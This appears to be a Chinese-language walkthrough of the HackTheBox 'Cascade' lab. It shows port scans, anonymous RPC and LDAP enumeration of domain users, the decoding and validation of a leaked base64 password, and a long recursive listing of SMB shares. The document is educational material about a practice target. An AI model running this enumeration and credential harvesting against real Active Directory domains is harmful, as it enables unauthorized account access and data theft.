Cascade-htb-writeup

0x00 靶场技能介绍

章节技能：RPC匿名登录和枚举、LDAP枚举、LDAP用户INFO信息泄露密码、SMB敏感文件泄露、VNC密码解密、Audit Share、DNSpy、反编译技术、AD Recycle Bin、恢复文件、密码复用

参考链接：https://0xdf.gitlab.io/2020/07/25/htb-cascade.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.182

2、获取下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.182     
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:07 CST
Nmap scan report for 10.10.10.182
Host is up (0.53s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3269/tcp  open  globalcatLDAPssl
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49170/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.79 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
53,135,139,445,3269,49155,49157,49158,49170,                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,135,139,445,3269,49155,49157,49158,49170 -min-rate=10000 -sC -sV 10.10.10.182
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:14 CST
Nmap scan report for 10.10.10.182
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3269/tcp  open  tcpwrapped
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -8h01m23s
| smb2-time: 
|   date: 2024-05-12T04:13:55
|_  start_date: 2024-05-12T03:38:44
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.30 seconds


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.182 -sU                               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-12 20:29 CST
Nmap scan report for 10.10.10.182
Host is up (0.58s latency).
Not shown: 65534 open|filtered udp ports (no-response)
PORT   STATE SERVICE
53/udp open  domain

Nmap done: 1 IP address (1 host up) scanned in 25.46 seconds

3、枚举发现rpc服务可以匿名登录并枚举，这里直接获取用户名ID信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ rpcclient -U "" -N 10.10.10.182 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v 0x | tr -d "[]" > users
                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat users                  
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft

4、绑定下本地hosts，再枚举下域用户ID

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.182 cascade.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.182 cascade.local

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./kerbrute userenum -d cascade.local --dc 10.10.10.182 ../users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 05/13/24 - Ronnie Flathers @ropnop

2024/05/13 05:50:15 >  Using KDC(s):
2024/05/13 05:50:15 >   10.10.10.182:88

2024/05/13 05:50:20 >  [+] VALID USERNAME:       j.goodhand@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       s.hickson@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       j.wakefield@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       s.smith@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       util@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       arksvc@cascade.local
2024/05/13 05:50:20 >  [+] VALID USERNAME:       r.thompson@cascade.local
2024/05/13 05:50:23 >  [+] VALID USERNAME:       a.turnbull@cascade.local
2024/05/13 05:50:26 >  [+] VALID USERNAME:       j.allen@cascade.local
2024/05/13 05:50:26 >  [+] VALID USERNAME:       BackupSvc@cascade.local
2024/05/13 05:50:26 >  [+] VALID USERNAME:       d.burman@cascade.local
2024/05/13 05:50:26 >  Done! Tested 15 usernames (11 valid) in 10.422 seconds

5、经过各种枚举，发现可以ldap匿名检索，这里再某个用户ID信息上，获取到了账号密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous

┌──(kali㉿offsec)-[~/Desktop]
└─$ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people

sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

6、这里的密码是base64位加密的，我在枚举SMB服务时提示错误才意识到

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p 'clk0bjVldmE=' --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\r.thompson:clk0bjVldmE= STATUS_LOGON_FAILURE 

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo clk0bjVldmE= | base64 -d   
rY4n5eva 

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u r.thompson -p 'rY4n5eva' --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\r.thompson:rY4n5eva

7、使用该账号密码，进行SMB目录可访问的枚举

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -u 'r.thompson' -p 'rY4n5eva' -H 10.10.10.182

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.182:445        Name: cascade.local             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share

8、这里我偷了个懒，我使用目录展示的形式，把所有信息都显示出来了

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva -c "recurse; ls"       
  .                                   D        0  Mon Jan 27 11:27:34 2020
  ..                                  D        0  Mon Jan 27 11:27:34 2020
  Contractors                         D        0  Mon Jan 13 09:45:11 2020
  Finance                             D        0  Mon Jan 13 09:45:06 2020
  IT                                  D        0  Wed Jan 29 02:04:51 2020
  Production                          D        0  Mon Jan 13 09:45:18 2020
  Temps                               D        0  Mon Jan 13 09:45:15 2020

\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*

\IT
  .                                   D        0  Wed Jan 29 02:04:51 2020
  ..                                  D        0  Wed Jan 29 02:04:51 2020
  Email Archives                      D        0  Wed Jan 29 02:00:30 2020
  LogonAudit                          D        0  Wed Jan 29 02:04:40 2020
  Logs                                D        0  Wed Jan 29 08:53:04 2020
  Temp                                D        0  Wed Jan 29 06:06:59 2020

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Temps
NT_STATUS_ACCESS_DENIED listing \Temps\*

\IT\Email Archives
  .                                   D        0  Wed Jan 29 02:00:30 2020
  ..                                  D        0  Wed Jan 29 02:00:30 2020
  Meeting_Notes_June_2018.html       An     2522  Wed Jan 29 02:00:12 2020

\IT\LogonAudit
  .                                   D        0  Wed Jan 29 02:04:40 2020
  ..                                  D        0  Wed Jan 29 02:04:40 2020

\IT\Logs
  .                                   D        0  Wed Jan 29 08:53:04 2020
  ..                                  D        0  Wed Jan 29 08:53:04 2020
  Ark AD Recycle Bin                  D        0  Sat Jan 11 00:33:45 2020
  DCs                                 D        0  Wed Jan 29 08:56:00 2020

\IT\Temp
  .                                   D        0  Wed Jan 29 06:06:59 2020
  ..                                  D        0  Wed Jan 29 06:06:59 2020
  r.thompson                          D        0  Wed Jan 29 06:06:53 2020
  s.smith                             D        0  Wed Jan 29 04:00:01 2020

\IT\Logs\Ark AD Recycle Bin
  .                                   D        0  Sat Jan 11 00:33:45 2020
  ..                                  D        0  Sat Jan 11 00:33:45 2020
  ArkAdRecycleBin.log                 A     1303  Wed Jan 29 09:19:11 2020

\IT\Logs\DCs
  .                                   D        0  Wed Jan 29 08:56:00 2020
  ..                                  D        0  Wed Jan 29 08:56:00 2020
  dcdiag.log                          A     5967  Sat Jan 11 00:17:30 2020

\IT\Temp\r.thompson
  .                                   D        0  Wed Jan 29 06:06:53 2020
  ..                                  D        0  Wed Jan 29 06:06:53 2020

\IT\Temp\s.smith
  .                                   D        0  Wed Jan 29 04:00:01 2020
  ..                                  D        0  Wed Jan 29 04:00:01 2020
  VNC Install.reg                     A     2680  Wed Jan 29 03:27:44 2020


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva -c "recurse; ls" 
  .                                   D        0  Thu Jan 16 05:50:33 2020
  ..                                  D        0  Thu Jan 16 05:50:33 2020
  MapAuditDrive.vbs                   A      258  Thu Jan 16 05:50:15 2020
  MapDataDrive.vbs                    A      255  Thu Jan 16 05:51:03 2020

                6553343 blocks of size 4096. 1613811 blocks available
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\print$ -U r.thompson%rY4n5eva -c "recurse; ls" 
  .                                   D        0  Tue Jul 14 13:37:10 2009
  ..                                  D        0  Tue Jul 14 13:37:10 2009
  color                               D        0  Tue Jul 14 13:37:10 2009
  IA64                                D        0  Tue Jul 14 12:58:30 2009
  W32X86                              D        0  Tue Jul 14 12:58:30 2009
  x64                                 D        0  Mon Jan 13 11:09:11 2020

\color
  .                                   D        0  Tue Jul 14 13:37:10 2009
  ..                                  D        0  Tue Jul 14 13:37:10 2009
  D50.camp                            A     1058  Thu Jun 11 04:46:16 2009
  D65.camp                            A     1079  Thu Jun 11 04:46:16 2009
  Graphics.gmmp                       A      797  Thu Jun 11 04:46:17 2009
  MediaSim.gmmp                       A      838  Thu Jun 11 04:46:21 2009
  Photo.gmmp                          A      786  Thu Jun 11 04:46:22 2009
  Proofing.gmmp                       A      822  Thu Jun 11 04:46:22 2009
  RSWOP.icm                           A   218103  Thu Jun 11 04:46:22 2009
  sRGB Color Space Profile.icm        A     3144  Thu Jun 11 04:46:22 2009
  wscRGB.cdmp                         A    17155  Thu Jun 11 04:46:23 2009
  wsRGB.cdmp                          A     1578  Thu Jun 11 04:46:23 2009

\IA64
  .                                   D        0  Tue Jul 14 12:58:30 2009
  ..                                  D        0  Tue Jul 14 12:58:30 2009

\W32X86
  .                                   D        0  Tue Jul 14 12:58:30 2009
  ..                                  D        0  Tue Jul 14 12:58:30 2009

\x64
  .                                   D        0  Mon Jan 13 11:09:11 2020
  ..                                  D        0  Mon Jan 13 11:09:11 2020
  3                                   D        0  Mon Jan 13 11:09:12 2020
  PCC                                 D        0  Mon Jan 13 11:12:37 2020

\x64\3
  .                                   D        0  Mon Jan 13 11:09:12 2020
  ..                                  D        0  Mon Jan 13 11:09:12 2020
  brci14a.dll                         A   712192  Tue Jul 14 09:40:12 2009
  BRCI14A.GPD                         A    10706  Thu Jun 11 04:41:11 2009
  brci14a.ini                         A       61  Thu Jun 11 04:41:11 2009
  brci14ui.dll                        A   127488  Tue Jul 14 09:41:34 2009
  BRD116C.BUD                         A    31632  Fri Jan 10 03:10:10 2020
  BRD116C.GPD                         A    11248  Thu Jun 11 04:41:11 2009
  brio14aa.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14ab.bcm                        A   220536  Thu Jun 11 04:41:18 2009
  brio14ac.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14ad.bcm                        A   132440  Thu Jun 11 04:41:18 2009
  brio14af.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14ag.bcm                        A   220536  Thu Jun 11 04:41:18 2009
  brio14ah.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14ai.bcm                        A   132440  Thu Jun 11 04:41:18 2009
  brio14ak.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14al.bcm                        A   220536  Thu Jun 11 04:41:18 2009
  brio14am.bcm                        A   127728  Thu Jun 11 04:41:18 2009
  brio14an.bcm                        A   132440  Thu Jun 11 04:41:19 2009
  en-US                               D        0  Tue Jul 14 13:41:17 2009
  mui                                 D        0  Tue Jul 14 13:41:16 2009
  mxdwdrv.dll                         A   715776  Sat Nov 20 13:27:24 2010
  mxdwdui.BUD                         A    57960  Mon Jan 13 11:09:04 2020
  mxdwdui.dll                         A   221184  Sat Nov 20 13:27:24 2010
  mxdwdui.gpd                         A    67628  Thu Jun 11 04:58:19 2009
  mxdwdui.ini                         A       42  Thu Jun 11 04:58:19 2009
  PS5UI.DLL                           A   847872  Sat Nov 20 13:27:24 2010
  PSCRIPT.HLP                         A    26038  Thu Jun 11 04:40:59 2009
  PSCRIPT.NTF                         A  1062732  Thu Jun 11 04:59:37 2009
  PSCRIPT5.DLL                        A   630272  Sat Nov 20 13:27:24 2010
  PS_SCHM.GDL                         A     5561  Thu Jun 11 04:59:18 2009
  STDDTYPE.GDL                        A    23812  Thu Jun 11 04:59:19 2009
  STDNAMES.GPD                        A    14362  Thu Jun 11 04:59:19 2009
  STDSCHEM.GDL                        A    59116  Thu Jun 11 04:59:19 2009
  STDSCHMX.GDL                        A     2278  Thu Jun 11 04:59:19 2009
  TPOG.bin                            A      415  Sat Mar 22 00:22:54 2014
  TPOG.chm                            A    21583  Sat Mar 22 00:22:52 2014
  TPPRN.DLL                           A   289608  Sat Mar 22 00:22:52 2014
  TPPrnUI.DLL                         A  1693000  Sat Mar 22 00:22:50 2014
  TPPrnUIchs.dll                      A    35144  Sat Mar 22 00:22:52 2014
  TPPrnUIcht.dll                      A    35144  Sat Mar 22 00:22:50 2014
  TPPrnUIcsy.dll                      A    41288  Sat Mar 22 00:22:52 2014
  TPPrnUIdeu.dll                      A    43336  Sat Mar 22 00:22:56 2014
  TPPrnUIell.dll                      A    42312  Sat Mar 22 00:22:50 2014
  TPPrnUIesn.dll                      A    43336  Sat Mar 22 00:22:56 2014
  TPPrnUIfra.dll                      A    43848  Sat Mar 22 00:22:56 2014
  TPPrnUIhun.dll                      A    41288  Sat Mar 22 00:22:56 2014
  TPPrnUIita.dll                      A    43336  Sat Mar 22 00:22:52 2014
  TPPrnUIjpn.dll                      A    37192  Sat Mar 22 00:22:50 2014
  TPPrnUIkor.dll                      A    37192  Sat Mar 22 00:22:54 2014
  TPPrnUIplk.dll                      A    41800  Sat Mar 22 00:22:50 2014
  TPPrnUIptb.dll                      A    42824  Sat Mar 22 00:22:54 2014
  TPPrnUIrus.dll                      A    42312  Sat Mar 22 00:22:50 2014
  TPPrnUIsve.dll                      A    41800  Sat Mar 22 00:22:50 2014
  TPPrnUItha.dll                      A    41288  Sat Mar 22 00:22:54 2014
  TPPS.DLL                            A   154448  Sat Mar 22 00:22:54 2014
  TPPS.INI                            A       60  Sat Mar 22 00:22:54 2014
  TPPS.PPD                            A     7175  Sat Mar 22 00:22:56 2014
  UNIDRV.DLL                          A   479232  Sat Nov 20 13:27:28 2010
  unidrv.hlp                          A    21225  Thu Jun 11 04:40:59 2009
  unidrvui.dll                        A   884224  Sat Nov 20 13:27:24 2010
  UNIRES.DLL                          A   762368  Sat Nov 20 13:09:22 2010
  XPSSVCS.DLL                         A  1576448  Sat Nov 20 13:27:34 2010

\x64\PCC
  .                                   D        0  Mon Jan 13 11:12:37 2020
  ..                                  D        0  Mon Jan 13 11:12:37 2020
  ntprint.inf_amd64_neutral_4616c3de1949be6d.cab      A  4073740  Mon Jan 13 11:09:14 2020
  oemprint.inf_amd64_neutral_1c61babacbb41e90.cab      A    81740  Thu Jan  9 23:27:28 2020
  oemprint.inf_amd64_neutral_eb780557355f07b5.cab      A  1394271  Thu Jan  9 23:15:49 2020
  prnbr009.inf_amd64_neutral_fd2ac5b9c40bd465.cab      A  1457321  Fri Jan 10 03:24:37 2020
  prnms001.inf_amd64_neutral_9fe8503f82ce60fa.cab      A    88480  Mon Jan 13 11:09:15 2020

\x64\3\en-US
  .                                   D        0  Tue Jul 14 13:41:17 2009
  ..                                  D        0  Tue Jul 14 13:41:17 2009
  BRCI06UI.DLL.mui                    A     6144  Tue Jul 14 10:28:04 2009
  brci08ui.dll.mui                    A     5632  Tue Jul 14 10:23:00 2009
  brci14ui.dll.mui                    A     6144  Tue Jul 14 10:27:54 2009
  BRCLUI05.DLL.mui                    A     6656  Tue Jul 14 10:25:08 2009
  BRCLUI06.DLL.mui                    A     6656  Tue Jul 14 10:30:32 2009
  brmzui13.DLL.mui                    A     3584  Tue Jul 14 10:27:24 2009
  BRPTUI2.DLL.mui                     A     9216  Tue Jul 14 10:27:14 2009
  BRUUI23A.DLL.mui                    A    10240  Tue Jul 14 10:30:06 2009
  CNBBR273.DLL.mui                    A     2048  Tue Jul 14 10:27:02 2009
  CNBBR274.DLL.mui                    A     2048  Tue Jul 14 10:29:50 2009
  CNBBR276.DLL.mui                    A     2048  Tue Jul 14 10:26:50 2009
  CNBBR280.DLL.mui                    A     2048  Tue Jul 14 10:26:34 2009
  CNBBR281.DLL.mui                    A     2048  Tue Jul 14 10:28:20 2009
  CNBBR282.DLL.mui                    A     2048  Tue Jul 14 10:23:12 2009
  CNBBR283.DLL.mui                    A     2048  Tue Jul 14 10:28:16 2009
  CNBBR284.DLL.mui                    A     2048  Tue Jul 14 10:28:12 2009
  CNBBR285.DLL.mui                    A     2048  Tue Jul 14 10:28:44 2009
  CNBBR286.DLL.mui                    A     2048  Tue Jul 14 10:30:26 2009
  CNBBR288.DLL.mui                    A     2048  Tue Jul 14 10:30:02 2009
  CNBBR289.DLL.mui                    A     2048  Tue Jul 14 10:24:44 2009
  CNBBR290.DLL.mui                    A     2048  Tue Jul 14 10:29:40 2009
  CNBBR292.DLL.mui                    A     2048  Tue Jul 14 10:26:46 2009
  CNBBR293.DLL.mui                    A     2048  Tue Jul 14 10:23:38 2009
  CNBBR294.DLL.mui                    A     2048  Tue Jul 14 10:25:26 2009
  CNBBR297.DLL.mui                    A     2048  Tue Jul 14 10:27:40 2009
  CNBBR300.DLL.mui                    A     2048  Tue Jul 14 10:24:10 2009
  CNBBR301.DLL.mui                    A     2048  Tue Jul 14 10:29:58 2009
  CNBBR302.DLL.mui                    A     2048  Tue Jul 14 10:30:08 2009
  CNBBR303.DLL.mui                    A     2048  Tue Jul 14 10:28:18 2009
  CNBBR309.DLL.mui                    A     2048  Tue Jul 14 10:29:46 2009
  CNBBR310.DLL.mui                    A     2048  Tue Jul 14 10:29:14 2009
  CNBBR311.DLL.mui                    A     2048  Tue Jul 14 10:30:08 2009
  CNBBR312.DLL.mui                    A     2048  Tue Jul 14 10:28:20 2009
  CNBBR315.DLL.mui                    A     2048  Tue Jul 14 10:27:22 2009
  CNBBR316.DLL.mui                    A     2048  Tue Jul 14 10:27:20 2009
  CNBBR318.DLL.mui                    A     2048  Tue Jul 14 10:26:10 2009
  CNBBR319.DLL.mui                    A     2048  Tue Jul 14 10:24:44 2009
  CNBBR320.DLL.mui                    A     2048  Tue Jul 14 10:24:56 2009
  CNBBR323.DLL.mui                    A     2048  Tue Jul 14 10:26:06 2009
  CNBBR325.DLL.mui                    A     2048  Tue Jul 14 10:29:08 2009
  CNBBR326.DLL.mui                    A     2048  Tue Jul 14 10:29:56 2009
  CNBBR327.DLL.mui                    A     2048  Tue Jul 14 10:29:42 2009
  CNBBR328.DLL.mui                    A     2048  Tue Jul 14 10:26:44 2009
  CNBBR331.DLL.mui                    A     2048  Tue Jul 14 10:23:02 2009
  CNBBR332.DLL.mui                    A     2048  Tue Jul 14 10:30:18 2009
  CNBBR333.DLL.mui                    A     2048  Tue Jul 14 10:30:18 2009
  CNBBR334.DLL.mui                    A     2048  Tue Jul 14 10:26:02 2009
  CNBBR335.DLL.mui                    A     2048  Tue Jul 14 10:29:46 2009
  CNBBR339.DLL.mui                    A     2048  Tue Jul 14 10:27:14 2009
  CNBBR342.DLL.mui                    A     2048  Tue Jul 14 10:28:52 2009
  CNBBR346.DLL.mui                    A     2048  Tue Jul 14 10:28:54 2009
  CNBIC4_1.DLL.mui                    A     2048  Tue Jul 14 10:28:24 2009
  CNBIC4_2.DLL.mui                    A     2048  Tue Jul 14 10:29:36 2009
  CNBIC4_3.DLL.mui                    A     2048  Tue Jul 14 10:27:36 2009
  CNBIC4_4.DLL.mui                    A     2048  Tue Jul 14 10:26:32 2009
  CNBIC4_5.DLL.mui                    A     2048  Tue Jul 14 10:23:52 2009
  CNBIC4_6.DLL.mui                    A     2048  Tue Jul 14 10:27:28 2009
  CNBIC4_7.DLL.mui                    A     2048  Tue Jul 14 10:28:26 2009
  CNBIC4_8.DLL.mui                    A     2048  Tue Jul 14 10:29:40 2009
  CNBMR284.DLL.mui                    A     2048  Tue Jul 14 10:27:36 2009
  CNBMR285.DLL.mui                    A     2048  Tue Jul 14 10:24:52 2009
  CNBMR310.DLL.mui                    A     2048  Tue Jul 14 10:26:42 2009
  CNBPC4_1.DLL.mui                    A     2048  Tue Jul 14 10:28:44 2009
  CNBPC4_2.DLL.mui                    A     2048  Tue Jul 14 10:27:06 2009
  CNBPCOMM.DLL.mui                    A     2048  Tue Jul 14 10:29:46 2009
  CNBPV3.DLL.mui                      A     2560  Tue Jul 14 10:23:54 2009
  CNBPV4.DLL.mui                      A     2560  Tue Jul 14 10:26:46 2009
  CNBP_274.DLL.mui                    A     2048  Tue Jul 14 10:25:42 2009
  CNBP_276.DLL.mui                    A     2048  Tue Jul 14 10:30:26 2009
  CNBP_279.DLL.mui                    A     2048  Tue Jul 14 10:24:24 2009
  CNBP_280.DLL.mui                    A     2048  Tue Jul 14 10:27:18 2009
  CNBP_281.DLL.mui                    A     2048  Tue Jul 14 10:26:10 2009
  CNBP_282.DLL.mui                    A     2048  Tue Jul 14 10:29:28 2009
  CNBP_283.DLL.mui                    A     2048  Tue Jul 14 10:23:04 2009
  CNBP_284.DLL.mui                    A     2048  Tue Jul 14 10:24:08 2009
  CNBP_285.DLL.mui                    A     2048  Tue Jul 14 10:25:00 2009
  CNBP_286.DLL.mui                    A     2048  Tue Jul 14 10:26:58 2009
  CNBP_287.DLL.mui                    A     2048  Tue Jul 14 10:29:44 2009
  CNBP_288.DLL.mui                    A     2048  Tue Jul 14 10:30:14 2009
  CNBP_289.DLL.mui                    A     2048  Tue Jul 14 10:26:18 2009
  CNBP_290.DLL.mui                    A     2048  Tue Jul 14 10:24:10 2009
  CNBP_291.DLL.mui                    A     2048  Tue Jul 14 10:26:26 2009
  CNBP_292.DLL.mui                    A     2048  Tue Jul 14 10:30:16 2009
  CNBP_293.DLL.mui                    A     2048  Tue Jul 14 10:29:02 2009
  CNBP_294.DLL.mui                    A     2048  Tue Jul 14 10:29:20 2009
  CNBP_295.DLL.mui                    A     2048  Tue Jul 14 10:23:58 2009
  CNBP_297.DLL.mui                    A     2048  Tue Jul 14 10:24:30 2009
  CNBP_298.DLL.mui                    A     2048  Tue Jul 14 10:29:26 2009
  CNBP_300.DLL.mui                    A     2048  Tue Jul 14 10:24:36 2009
  CNBP_301.DLL.mui                    A     2048  Tue Jul 14 10:29:36 2009
  CNBP_302.DLL.mui                    A     2048  Tue Jul 14 10:24:06 2009
  CNBP_303.DLL.mui                    A     2048  Tue Jul 14 10:29:44 2009
  CNBP_309.DLL.mui                    A     2048  Tue Jul 14 10:24:46 2009
  CNBP_310.DLL.mui                    A     2048  Tue Jul 14 10:29:50 2009
  CNBP_311.DLL.mui                    A     2048  Tue Jul 14 10:30:06 2009
  CNBP_312.DLL.mui                    A     2048  Tue Jul 14 10:30:16 2009
  CNBP_315.DLL.mui                    A     2048  Tue Jul 14 10:28:30 2009
  CNBP_316.DLL.mui                    A     2048  Tue Jul 14 10:26:14 2009
  CNBP_317.DLL.mui                    A     2048  Tue Jul 14 10:28:18 2009
  CNBP_318.DLL.mui                    A     2048  Tue Jul 14 10:25:22 2009
  CNBP_319.DLL.mui                    A     2048  Tue Jul 14 10:30:24 2009
  CNBP_320.DLL.mui                    A     2048  Tue Jul 14 10:29:10 2009
  CNBP_321.DLL.mui                    A     2048  Tue Jul 14 10:28:42 2009
  CNBP_323.DLL.mui                    A     2048  Tue Jul 14 10:24:36 2009
  CNBP_324.DLL.mui                    A     2048  Tue Jul 14 10:24:52 2009
  CNBP_325.DLL.mui                    A     2048  Tue Jul 14 10:29:48 2009
  CNBP_326.DLL.mui                    A     2048  Tue Jul 14 10:29:18 2009
  CNBP_327.DLL.mui                    A     2048  Tue Jul 14 10:28:56 2009
  CNBP_328.DLL.mui                    A     2048  Tue Jul 14 10:28:34 2009
  CNBP_329.DLL.mui                    A     2048  Tue Jul 14 10:30:34 2009
  CNBP_331.DLL.mui                    A     2048  Tue Jul 14 10:28:14 2009
  CNBP_332.DLL.mui                    A     2048  Tue Jul 14 10:26:40 2009
  CNBP_333.DLL.mui                    A     2048  Tue Jul 14 10:28:00 2009
  CNBP_334.DLL.mui                    A     2048  Tue Jul 14 10:23:38 2009
  CNBP_335.DLL.mui                    A     2048  Tue Jul 14 10:29:30 2009
  CNBP_336.DLL.mui                    A     2048  Tue Jul 14 10:30:32 2009
  CNBP_337.DLL.mui                    A     2048  Tue Jul 14 10:27:22 2009
  CNBP_338.DLL.mui                    A     2048  Tue Jul 14 10:29:42 2009
  CNBP_339.DLL.mui                    A     2048  Tue Jul 14 10:29:56 2009
  CNBP_340.DLL.mui                    A     2048  Tue Jul 14 10:27:40 2009
  CNBP_341.DLL.mui                    A     2048  Tue Jul 14 10:27:34 2009
  CNBP_342.DLL.mui                    A     2048  Tue Jul 14 10:24:42 2009
  CNBP_346.DLL.mui                    A     2048  Tue Jul 14 10:24:36 2009
  CNN0B007.DLL.mui                    A     2048  Tue Jul 14 10:25:40 2009
  EP7RES00.DLL.mui                    A     4096  Tue Jul 14 10:28:08 2009
  EP7RES01.DLL.mui                    A     3584  Tue Jul 14 10:28:26 2009
  EP7UIP00.DLL.mui                    A     5120  Tue Jul 14 10:26:40 2009
  FXSRES.DLL.mui                      A   165376  Tue Jul 14 10:28:24 2009
  FXUCU001.DLL.mui                    A     7680  Tue Jul 14 10:28:24 2009
  hp6000at.dll.mui                    A    48640  Tue Jul 14 10:29:56 2009
  hp6000nt.dll.mui                    A    48640  Tue Jul 14 10:25:18 2009
  hp6500at.dll.mui                    A    48640  Tue Jul 14 10:26:30 2009
  hp6500nt.dll.mui                    A    48640  Tue Jul 14 10:26:34 2009
  hp8000at.dll.mui                    A    48640  Tue Jul 14 10:29:38 2009
  hp8500at.dll.mui                    A    48640  Tue Jul 14 10:27:44 2009
  hp8500gt.dll.mui                    A    48640  Tue Jul 14 10:29:30 2009
  hp8500nt.dll.mui                    A    48640  Tue Jul 14 10:28:46 2009
  hpb8500t.dll.mui                    A    49152  Tue Jul 14 10:29:16 2009
  hpc309at.dll.mui                    A    49152  Tue Jul 14 10:26:46 2009
  hpc4500t.dll.mui                    A    49152  Tue Jul 14 10:28:24 2009
  hpc4600t.dll.mui                    A    47616  Tue Jul 14 10:27:58 2009
  hpc5300t.dll.mui                    A    49152  Tue Jul 14 10:23:56 2009
  hpc5500t.dll.mui                    A    49152  Tue Jul 14 10:25:12 2009
  hpc6300t.dll.mui                    A    49152  Tue Jul 14 10:27:34 2009
